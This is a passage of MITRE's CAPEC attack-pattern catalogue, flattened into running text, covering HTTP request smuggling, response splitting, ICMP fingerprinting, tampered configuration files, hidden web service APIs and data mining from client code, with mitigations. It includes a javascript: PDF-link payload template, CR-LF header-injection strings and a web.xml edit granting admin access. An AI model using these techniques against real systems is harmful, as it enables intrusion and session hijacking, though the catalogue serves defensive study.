requests. When differences are identified, the attacker crafts specially malformed HTTP requests to determine if the identified parsing differences will allow extra requests to be smuggled through parsing layers. Create many consecutive requests to the server. Some of which must be malformed. env-Web Use a proxy tool to record the HTTP responses headers. env-Web At some point, the server is waiting for more request information to send the last response. env-Web No response is being received. env-Web Malformed HTTP requests are being totally ignored. env-Web Responses are being sent even if the HTTP header is incomplete. env-Web One layer in the application's HTTP parsing chain processes HTTP Requests that other layers do not. The server smuggles the user request into the last attacker's request and transport data such as cookie, etc. The server replies with an error to the last attacker's request. No response for the last incomplete request from the attacker by the server Monitor requests to the server that seem malformed. Cache poisoning The attacker decides to target the cache server. The server will then cache the request and serve a wrong page to a legitimate user's request. The malicious request will most likely exploit a Cross-Site Scripting or another injection typed vulnerability. Leverage the vulnerabilities identified in the Experiment Phase to inject malicious HTTP request that contains HTTP Request syntax that will be processed and acted on by the outer parsing layer of the cache server but not by the inner application layer. In this way it will be cached by the server without obvious sign from the application and the corrupt data will be served to future requesters. env-Web The attacker gets the users to be served with this cached malicious HTTP request. Monitor server logs for consecutive suspicious HTTP requests. Session Hijacking The attacker decides to target the web server by crafting a malicious HTTP Request containing a second HTTP Request using syntax that will not be processed and acted on by an outer "filter" parsing layer but will be acted on by the inner web server/application processing layers. The application/web server will then act on the malicious HTTP Request as if it is a valid request from the client potentially subverting session management. Leverage the vulnerabilities identified in the Experiment Phase to inject malicious HTTP request that contains HTTP Request syntax that will not be processed and acted on by the outer parsing layer of the malicious content filters but will be by the inner application/web server layer. In this way it will be acted on by the application/web server as if it is a valid request from the client. env-Web The attacker gets the application/web server to act on the malicious HTTP request and allows the attacker to gain control of the target user's session. Monitor server logs for consecutive suspicious HTTP requests. An additional HTTP entity such as an application firewall or a web caching proxy between the attacker and the second entity such as a web server Differences in the way the two HTTP entities parse HTTP requests High Medium Protocol Manipulation Injection When using Sun Java System Web Proxy Server 3.x or 4.x in conjunction with Sun ONE/iPlanet 6.x, Sun Java System Application Server 7.x or 8.x, it is possible to bypass certain application firewall protections, hijack web sessions, perform Cross Site Scripting or poison the web proxy cache using HTTP Request Smuggling. Differences in the way HTTP requests are parsed by the Proxy Server and the Application Server enable malicious requests to be smuggled through to the Application Server, thereby exposing the Application Server to aforementioned attacks. CVE-2006-6276 Apache server 2.0.45 and version before 1.3.34, when used as a proxy, easily lead to web cache poisoning and bypassing of application firewall restrictions because of non-standard HTTP behavior. Although the HTTP/1.1 specification clearly states that a request with both "Content-Length" and a "Transfer-Encoding: chunked" headers is invalid, vulnerable versions of Apache accept such requests and reassemble the ones with "Transfer-Encoding: chunked" header without replacing the existing "Content-Length" header or adding its own. This leads to HTTP Request Smuggling using a request with a chunked body and a header with "Content-Length: 0". CVE-2005-2088 High The attacker has to have detailed knowledge of the HTTP protocol specifics and must also possess exact details on the discrepancies between the two targeted entities in parsing HTTP requests. None If system documentation is available, the attacker can look up the exact versions of the two targeted entities, since different versions of the same system often behave differently. The attacker can also use product-specific documentation to figure out differences in parsing HTTP requests between the two entities. In case where no documentation is available, the attacker needs to reliably fingerprint the targeted entities to discover the nature and version of the entities. Having done this, the attacker then needs to experimentally determine how the two entities differ in parsing requests. Differences in requests processed by the two entities. This requires careful monitoring or a capable log analysis tool. HTTP Request Smuggling is usually targeted at web servers. Therefore, in such cases, careful analysis of the entities must occur during system design prior to deployment. If there are known differences in the way the entities parse HTTP requests, the choice of entities needs consideration. Employing an application firewall can help. However, there are instances of the firewalls being susceptible to HTTP Request Smuggling as well. Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Access_Control Authorization Gain privileges / assume identity Integrity Modify application data HTTP requests that are interpreted and parsed differently by the targeted entities. HTTP request to be smuggled through the first entity to the second one. The application server behind another HTTP entity The impact of activation is that a particular request that was not supposed to pass through the first entity is received by the second entity who responds to it. This can defeat protection against malware or lead to Cross-Site Scripting 444 Targeted 436 Secondary 707 Targeted 1000 Attack Pattern ChildOf 220 333 Category HasMember 359 System integration testing must include security checks to protect against Multiple Interpretation Errors across systems. Economy of Mechanism Securing the Weakest Link Carefully Study Other Systems Before Incorporating Them into Your System Design Configuration Subsystems Correctly and Distribute Safe Default Configurations Penetration Medium Medium Low Client-Server n-Tier All All All Common Weakness Enumeration (CWE) CWE-444 - HTTP Request Smuggling Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/444.html Common Weakness Enumeration (CWE) CWE-436 - Multiple Interpretation Error Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/436.html Chiradeep B Chhaya 2007-01-10 First Draft Chiradeep B Chhaya 2007-01-10 First Draft Malik Hamro Cigital, Inc 2007-02-27 Reformat to new schema and review Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description Malik Hamro Cigital, Inc 2007-02-27 Reformat to new schema and review Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description An attacker uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the integrity of data returned or "Quoted" from the originating request that generated the error message. For this purpose "Port Unreachable" error messages are often used, as generating them requires the attacker to send a UDP datagram to a closed port on the target. When replying with an ICMP error message some IP/ICMP stack implementations change aspects of the IP header, change or reverse certain byte orders, reset certain field values to default values which differ between operating system and firmware implementations, and make other changes. Some IP/ICMP stacks are decidedly broken, indicating an idiosyncratic behavior that differs from the RFC specifications, such as the case when miscalculations affect a field value. A tremendous amount of information about the host operating system can be deduced from its 'echoing' characteristics. Notably, inspection of key protocol header fields, including the echoed header fields of the encapsulating protocol can yield a wealth of data about the host operating system or firmware version. Network Layer Server-side Host RFC 792 Type The ICMP Type Field determines the function of the ICMP query. A Type 8 message directs the target to reply to the sender of the echo request message with an echo reply message. In forming an echo reply the source and destination addresses are switched, the Type field is set to '0', any data contained in the data portion of the echo request is sent "echoed" back to the host, and the checksum is recalculated. 8 ICMP echo requests may contain arbitrary data as a payload. When the ICMP Type is 8 (echo request), the data received in the echo message must be returned in the echo reply message. Uses Protocol The ability to send a UDP datagram to a closed port and receive an ICMP Error Message Type 3, "Port Unreachable." Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 316 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 J. Postel RFC792 - Internet Control Messaging Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc792.html R. Braden, Ed. RFC1122 - Requirements for Internet Hosts - Communication Layers October 1989 http://www.faqs.org/rfcs/rfc1122.html Ofir Arkin A Remote Active OS Fingerprinting Tool using ICMP The Sys-Security Group April 2002 http://ofirarkin.files.wordpress.com/2008/11/login.pdf CAPEC Content Team MITRE 2014-02-06 Updated Attack_Prerequisites, Description Summary An attacker sends a UDP packet to a closed port on the target machine to solicit an IP Header's total length field value within the echoed 'Port Unreachable" error message. RFC1122 specifies that the Header of the request must be echoed back when an error is sent in response, but some operating systems and firmware alter the integrity of the original header. Non-standard ICMP/IP implementations result in response that are useful for individuating remote operating system or router firmware versions. There are four general response types that can be used to distinguish operating systems apart. 1. The IP total length field may be calculated correctly. 2. An operating system may add 20 or more additional bytes to the length calculation. 3. The operating system may subtract 20 or more bytes from the correct length of the field 4. The IP total length field is calculated with any other incorrect value. This type of behavior is useful for building a signature-base of operating system responses, particularly when error messages contain other types of information that is useful identifying specific operating system responses. Network Layer Server-side Host RFC 792 Type The ICMP Type Field determines the function of the ICMP query. A Type 8 message directs the target to reply to the sender of the echo request message with an echo reply message. In forming an echo reply the source and destination addresses are switched, the Type field is set to '0', any data contained in the data portion of the echo request is sent "echoed" back to the host, and the checksum is recalculated. 8 ICMP echo requests may contain arbitrary data as a payload. When the ICMP Type is 8 (echo request), the data received in the echo message must be returned in the echo reply message. Uses Protocol Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 316 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 J. Postel RFC792 - Internet Control Messaging Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc792.html R. Braden, Ed. RFC1122 - Requirements for Internet Hosts - Communication Layers October 1989 http://www.faqs.org/rfcs/rfc1122.html Ofir Arkin A Remote Active OS Fingerprinting Tool using ICMP The Sys-Security Group April 2002 http://ofirarkin.files.wordpress.com/2008/11/login.pdf An attacker sends a UDP datagram having an assigned value to its internet identification field (ID) to a closed port on a target to observe the manner in which this bit is echoed back in the ICMP error message. The internet identification field (ID) is typically utilized for reassembling a fragmented packet. RFC791 and RFC815 discusses about IP datagrams, fragmentation and reassembly. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within the ICMP error message. There are 3 behaviors that can be used to distinguish remote operating systems or firmware. The IP ID field is echoed back identically to the bit order of the ID field in the original IP header. The IP ID field is echoed back, but the byte order has been reversed. The IP ID field contains an incorrect or unexpected value. Different operating systems will respond by setting the IP ID field differently within error messaging. This allows the attacker to construct a fingerprint of specific OS behaviors. Network Layer Server-side Host RFC 792 Type The ICMP Type Field determines the function of the ICMP query. A Type 8 message directs the target to reply to the sender of the echo request message with an echo reply message. In forming an echo reply the source and destination addresses are switched, the Type field is set to '0', any data contained in the data portion of the echo request is sent "echoed" back to the host, and the checksum is recalculated. 8 ICMP echo requests may contain arbitrary data as a payload. When the ICMP Type is 8 (echo request), the data received in the echo message must be returned in the echo reply message. Uses Protocol The ability to send a UDP datagram to a closed port and receive an ICMP Error Message Type 3, "Port Unreachable. Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 316 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 J. Postel RFC792 - Internet Control Messaging Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc792.html R. Braden, Ed. RFC1122 - Requirements for Internet Hosts - Communication Layers October 1989 http://www.faqs.org/rfcs/rfc1122.html Ofir Arkin A Remote Active OS Fingerprinting Tool using ICMP The Sys-Security Group April 2002 http://ofirarkin.files.wordpress.com/2008/11/login.pdf CAPEC Content Team MITRE 2014-02-06 Updated Attack_Prerequisites, Description This attack uses a maliciously-crafted HTTP request in order to cause a vulnerable web server to respond with an HTTP response stream that will be interpreted by the client as two separate responses instead of one. This is possible when user-controlled input is used unvalidated as part of the response headers. The target software, the client, will interpret the injected header as being a response to a second request, thereby causing the maliciously-crafted contents be displayed and possibly cached. To achieve HTTP Response Splitting on a vulnerable web server, the attacker: Spider Using a browser or an automated tool, an attacker follows all public links on a web site. He records all the links, the forms and all potential user-controllable input points for the web application. Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL, forms found in the pages (like file upload, etc.). env-Web Use a proxy tool to record all links visited during a manual traversal of the web application. env-Web Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery. env-Web Inputs are transported through HTTP env-Web The application uses redirection techniques (HTTP Location, etc.) env-Web Using URL rewriting, parameters may be part of the URL path. env-Web No parameters appear to be used on the current page. Even though none appear, the web application may still use them if they are provided. env-Web Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible. env-Web A list of user-controllable input entry points is created by the attacker. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. Use CAPTCHA to prevent the use of the application by an automated tool. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Attempt variations on input parameters The attacker injects the entry points identified in the Explore Phase with response splitting syntax and variations of payloads to be acted on in the additional response. He records all the responses from the server that include unmodified versions of his payload. Use CR\LF characters (encoded or not) in the payloads in order to see if the HTTP header can be split. env-Web Use a proxy tool to record the HTTP responses headers. env-Web The web server uses unvalidated user-controlled input as part of the response headers env-Web The CR\LF characters are passed in the HTTP header and two responses are generated for a single request. All CR\LF characters are consistently re-encoded or stripped before being written in the HTTP header The size of the payload is being limited by the server-side application. Some sensitive characters are consistently encoded, but others are not. Monitor input to web servers (not only GET, but all in the inputs), application servers, and other HTTP infrastructure (e.g., load balancers). Alert on CR\LF characters. Do not use user-controllable inputs in HTTP headers Filter CR/LF syntax out of any user-controllable input utilized in HTTP headers. Actively monitor the application and either deny or redirect requests from origins that appear to be generating HTTP Response Splitting attacks. Cross-Site Scripting As the attacker succeeds in exploiting the vulnerability, he can choose to attack the user with Cross-Site Scripting. The possible outcomes of such an attack are described in the Cross-Site Scripting related attack patterns. Inject cross-site scripting payload preceded by response splitting syntax (CR/LF) into user-controllable input identified as vulnerable in the Experiment Phase. env-Web The malicious script is executed within the user's context. Monitor server logs for consecutive suspicious HTTP request Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Cache poisoning The attacker decides to target the cache server by forging new responses. The server will then cache the second request and response. The cached response has most likely an attack vector like Cross-Site Scripting; this attack will then be serve to many clients due to the caching system. env-Web System performs caching of HTTP responses env-Web The attacker gets the users to be served with this cached malicious HTTP response. Monitor server logs for consecutive suspicious HTTP requests. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax User-controlled input used as part of HTTP header Ability of attacker to inject custom strings in HTTP header Insufficient input validation in application to check for input sanity before using it as part of response header High Medium Injection Protocol Manipulation In the PHP 5 session extension mechanism, a user-supplied session ID is sent back to the user within the Set-Cookie HTTP header. Since the contents of the user-supplied session ID are not validated, it is possible to inject arbitrary HTTP headers into the response body. This immediately enables HTTP Response Splitting by simply terminating the HTTP response header from within the session ID used in the Set-Cookie directive. CVE-2006-0207 High The attacker needs to have a solid understanding of the HTTP protocol and HTTP headers and must be able to craft and inject requests to elicit the split responses. None With available source code, the attacker can see whether user input is validated or not before being used as part of output. This can also be achieved with static code analysis tools If source code is not available, the attacker can try injecting a CR-LF sequence (usually encoded as %0d%0a in the input) and use a proxy such as Paros to observe the response. If the resulting injection causes an invalid request, the web server may also indicate the protocol error. The only indicators are multiple responses to a single request in the web logs. However, this is difficult to notice in the absence of an application filter proxy or a log analyzer. There are no indicators for the client To avoid HTTP Response Splitting, the application must not rely on user-controllable input to form part of its output response stream. Specifically, response splitting occurs due to injection of CR-LF sequences and additional headers. All data arriving from the user and being used as part of HTTP response headers must be subjected to strict validation that performs simple character-based as well as semantic filtering to strip it of malicious character sequences and headers. Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Access_Control Authorization Gain privileges / assume identity User-controllable input that forms part of output HTTP response headers Encoded HTTP header and data separated by appropriate CR-LF sequences. The injected data must consist of legitimate and well-formed HTTP headers as well as required script to be included as HTML body. API calls in the application that set output response headers. The impact of payload activation is that two distinct HTTP responses are issued to the target, which interprets the first as response to a supposedly valid request and the second, which causes the actual attack, to be a response to a second dummy request issued by the attacker. 113 Targeted 697 Targeted 707 Targeted 713 Targeted 74 Secondary 1000 Attack Pattern ChildOf 220 333 Category HasMember 358 All client-supplied input must be validated through filtering and all output must be properly escaped. Reluctance to Trust Never trust user-supplied input. Penetration High High Low Client-Server n-Tier All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-113 - HTTP Response Splitting Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/113.html Common Weakness Enumeration (CWE) CWE-74 - Injection Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/74.html Chiradeep B Chhaya 2007-01-09 First Draft Chiradeep B Chhaya 2007-01-09 First Draft Malik Hamro Cigital, Inc 2007-02-27 Reformat to new schema and review Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description Malik Hamro Cigital, Inc 2007-02-27 Reformat to new schema and review Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/) http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality. < security-constraint> <description>Security processing rules for admin screens</description> <url-pattern>/admin/*</url-pattern> <http-method>POST</http-method> <http-method>GET</http-method> <auth-constraint> <role-name>administrator</role-name> <role-name>public</role-name> </auth-constraint> </security-constraint> The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control. The attacker must have the ability to modify non-executable files consumed by the target software. Very High High Injection API Abuse Modification of Resources Virtually any system that relies on configuration files for runtime behavior is open to this attack vector. The configuration files are frequently stored in predictable locations, so an attacker that can fingerprint a server process such as a web server or database server can quickly identify the likely locale where the configuration is stored. And this is of course not limited to server processes. Unix shells rely on profile files to store environment variables, search paths for programs and so on. If the aliases are changed, then a standard Unix "cp" command can be rerouted to "rm" or other standard command so the user's intention is subverted. Low To identify and execute against an over-privileged system interface Ability to communicate synchronously or asynchronously with server that publishes an over-privileged directory, program, or interface. Optionally, ability to capture output directly through synchronous communication or other method such as FTP. Design: Enforce principle of least privilege Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands. Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables. Implementation: Implement host integrity monitoring to detect any unwanted altering of configuration files. Implementation: Ensure that files that are not required to execute, such as configuration files, are not over-privileged, i.e. not allowed to execute. Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Integrity Modify application data Confidentiality Access_Control Authorization Gain privileges / assume identity Non-executable files Executable code Client machine and client network Enables attacker to execute server side code with any commands that the program owner has privileges to. 94 Targeted 96 Targeted 95 Targeted 97 Targeted 272 Secondary 59 Secondary 282 Secondary 275 Secondary 264 Secondary 270 Secondary 714 Targeted Microsoft Security Bulletin MS04-028 Buffer Overrun in JPEG Processing (GDI+) Could Allow Code Execution 1000 Attack Pattern PeerOf 23 1000 Attack Pattern PeerOf 75 1000 Attack Pattern ChildOf 165 Exploitation Medium High Low All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.35.1][REF-2] Cigital, Inc 2007-01-01 [R.35.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Examples-Instances, Injection_Vector, Resources_Required, Solutions_and_Mitigations, Type (Attack_Pattern -> Attack_Pattern) An attacker searches for and invokes Web Services APIs that the target system designers did not intend to be publicly available. If these APIs fail to authenticate requests the attacker may be able to invoke services and/or gain privileges they are not authorized for. Discover a web service of interest, by exploring web service registry listings or by connecting on known port or some similar means Authenticate to the web service, if required, in order to explore it. Determine the exposed interfaces by querying the registry as well as probably sniffing to expose interfaces that are not explicitly listed. The architecture under attack must publish or otherwise make available services, of some kind, that clients can attach to, either in an unauthenticated fashion, or having obtained an authentication token elsewhere. The service need not be 'discoverable' but in the event it isn't, must have some way of being discovered by an attacker. This might include listening on a well-known port. Ultimately, the likelihood of exploit depends on discoverability of the vulnerable service. High Medium Analysis API Abuse To an extent, Google services (such as Google Maps) are all well-known examples. Calling these services, or extending them for one's own (perhaps very different) purposes is as easy as knowing they exist. Their unencumbered public use, however, is a purposeful aspect of Google's business model. Most organizations, however, do not have the same business model. Organizations publishing services usually fall back on thoughts that Attackers "will not know services exist" and that "even if they did, they wouldn't be able to access them because they're not on the local LAN." Simple threat modeling exercises usually uncovers simple attack vectors that can invalidate these assumptions. Low A number of web service digging tools are available for free that help discover exposed web services and their interfaces. In the event that a web service is not listed, the attacker does not need to know much more in addition to the format of web service messages that he can sniff/monitor for. No special resources are required in order to conduct these attacks. Web service digging tools may be helpful. Probing techniques should often follow normal means of identifying services. Attackers will simply have to execute code that sends the appropriate interrogating SOAP messages to suspected UDDI services (in web-services scenarios). Attackers will likely want to detect and query the organization's SOA Registry. Probing techniques become more difficult when the service isn't advertised, or doesn't leverage discovery frameworks such as UDDI or the WS-I standard. In these cases, sniffing network traffic may suffice, depending on whether or not discovery occurs over a protected channel. Authenticating both services and their discovery, and protecting that authentication mechanism simply fixes the bulk of this problem. Protecting the authentication involves the standard means, including: 1) protecting the channel over which authentication occurs, 2) preventing the theft, forgery, or prediction of authentication credentials or the resultant tokens, or 3) subversion of password reset and the like. Confidentiality Read application data Confidentiality Access_Control Authorization Gain privileges / assume identity 306 Targeted 693 Targeted 695 Targeted 1000 Attack Pattern ChildOf 113 Authenticate every request or message to a service Do not rely on lack of discoverability to protect privileged functions within the service Never Assuming that Your Secrets Are Safe Complete Mediation Use Authorization Mechanisms Correctly Use Authentication Mechanisms, Where Appropriate, Correctly Penetration High Medium Low SOA All All All John Steven Cigital, Inc 2007-02-10 Initial core pattern content John Steven Cigital, Inc 2007-02-10 Initial core pattern content Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases An attacker can resort to stealing data embedded in client distributions or client code in order to gain certain information. This information can reveal confidential contents, such as account numbers, or can be used as an intermediate step in a larger attack (such as by stealing keys/credentials). Identify Target Attacker identifies client components to extract information from. These may be binary executables, class files, shared libraries (e.g., DLLs), or other machine code. Binary file extraction. The attacker extracts binary files from zips, jars, wars, PDFs or other composite formats. env-Local env-Embedded env-ClientServer env-Peer2Peer Package listing. The attacker uses a package manifest provided with the software installer, or the filesystem itself, to identify component files suitable for attack. env-Local env-Embedded env-ClientServer env-Peer2Peer Proprietary or sensitive data is stored in a location ultimately distributed to end users. env-Local env-Embedded env-ClientServer env-Peer2Peer Access to binary code is not realistic. For example, in a client-server environment, binary code on the server is presumed to be inscrutable to an attacker unless another vulnerability exposes it. env-Web env-ClientServer env-Peer2Peer env-CommProtocol The attacker identifies one or more files or data in the software to attack. Obfuscation can make the observation and reverse engineering more difficult. It is only capable of delaying an attacker, however, not preventing a sufficiently motivated and resourced one. Apply mining techniques The attacker then uses a variety of techniques, such as sniffing, reverse-engineering, and cryptanalysis to extract the information of interest. API Profiling. The attacker monitors the software's use of registry keys or other operating system-provided storage locations that can contain sensitive information. env-Local env-Embedded env-ClientServer env-Peer2Peer Execution in simulator. The attacker physically removes mass storage from the system and explores it using a simulator, external system, or other debugging harness. env-Local env-Embedded Cryptanalysis. The attacker performs cryptanalysis to identify data in the client component which may be cryptographically significant. (Key material frequently stands out as very high entropy data when compared to other mundane data). Given cryptographically significant data, other analyses are performed (e.g., length, internal structure, etc.) to determine potential algorithms (RSA, ECC, AES, etc.). This process proceeds until the attacker reaches a conclusion about the significance and use of the data. env-Local env-Embedded env-ClientServer env-Peer2Peer Common decoding methods. The attacker applies methods to decode such encodings and compressions as Base64, unzip, unrar, RLE decoding, gzip decompression and so on. env-All Common data typing. The attacker looks for common file signatures for well-known file types (JPEG, TIFF, ASN.1, LDIF, etc.). If the signatures match, he attempts decoding in that format. env-All Well known data types are used and embedded inside the client-accessible code. env-Local env-Embedded env-ClientServer env-Peer2Peer Proprietary data encodings are used. Although this incrementally increases the difficulty for an attacker to decode the data, it provides no better protection than well-known data types. Since few software developers are trained in obfuscation and cryptography, most proprietary encodings add little security value. env-Local env-Embedded env-ClientServer env-Peer2Peer The attacker extracts useful information. The software can contain an update mechanism, key management mechanism, or other means of updating proprietary data. Although this can react to a single breach, it is not an effective continuing solution. Many software manufacturers are lured into a repeated update cycle (c.f., satellite TV providers, iPhone) as hackers break proprietary data protection schemes. Planning to issue corrections is a poor long-term strategy, but it can be an effective stopgap measure until a design-level correction can be made. In order to feasibly execute this class of attacks, some valuable data must be present in client software. Additionally, this information must be unprotected, or protected in a flawed fashion, or through a mechanism that fails to resist reverse engineering, statistical, cryptanalytic, or other attack. Very High Very High Analysis Using a tool such as 'strings' or similar to pull out text data, perhaps part of a database table, that extends beyond what a particular user's purview should be. An attacker can also use a decompiler to decompile a downloaded Java applet in order to look for information such as hardcoded IP addresses, file paths, passwords or other such contents. Attacker uses a tool such as a browser plug-in to pull cookie or other token information that, from a previous user at the same machine (perhaps a kiosk), allows the attacker to log in as the previous user. Medium The attacker must possess knowledge of client code structure as well as ability to reverse-engineer or decompile it or probe it in other ways. This knowledge is specific to the technology and language used for the client distribution The attacker must possess access to the client machine or code being exploited. Such access, for this set of attacks, will likely be physical. The attacker will make use of reverse engineering technologies, perhaps for data or to extract functionality from the binary. Such tool use may be as simple as "Strings" or a hex editor. Removing functionality may require the use of only a hex editor, or may require aspects of the toolchain used to construct the application: for instance the Adobe Flash development environment. Attacks of this nature do not require network access or undue CPU, memory, or other hardware-based resources. Attackers may confine (and succeed with) probing as simple as deleting a cache or data file, or less drastically twiddling its bits and then testing the mutation's effect on an executing client. At the other extreme, attackers capable of reverse engineering client code will have the ability to remove functionality or identify the whereabouts of sensitive data through white box analysis, such as review of reverse-engineered code. Confidentiality Read application data Integrity Modify application data Confidentiality Access_Control Authorization Gain privileges / assume identity This pattern of attacks possesses no injection vector, in its normal instances, as it affects clients fundamentally vulnerable to client-side trust issues. One exception to this rule exists: attacks making use of second-order injection attacks (SQL, XSS, or similar command injection) may 'deliver' an attack, through an intermediate server or data store, to a peer-client, or another user's use of the same client. In the case of the second instance (another user's use) this vector seems onerous but would be necessary in circumstances in which the hosting system protects the application well but implicitly trusts (potentially malicious) data received from the server (such as may be the case in kiosks well-protected through physical means). Client-side software, whether it be a monolithic application, client/server, or n-tier (web-based). 311 Targeted 525 Targeted 312 Targeted 314 Secondary 315 Secondary 318 Secondary 1000 Attack Pattern ChildOf 167 No sensitive or confidential information must be stored in client distributions. This includes content such as passwords or encryption keys. In cases where this is necessary, avoid storing any such information in plaintext All information arriving from a client must be validated before use. Reluctance to Trust Never Assuming that Your Secrets Are Safe Never Use Unvalidated Input as Part of a Directive to any Internal Component Treat the Entire Inherited Process Context as Unvalidated Input Use Well-Known Cryptography Appropriately and Correctly Reconnaissance Exploitation High Medium Low All All All All John Steven Cigital, Inc 2007-02-10 Initial core pattern content John Steven Cigital, Inc 2007-02-10 Initial core pattern content Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Probing_Techniques This attack loads a malicious resource into a program's standard path used to bootstrap and/or provide contextual information for a program like a path variable or classpath. J2EE applications and other component based applications that are built from multiple binaries can have very long list of 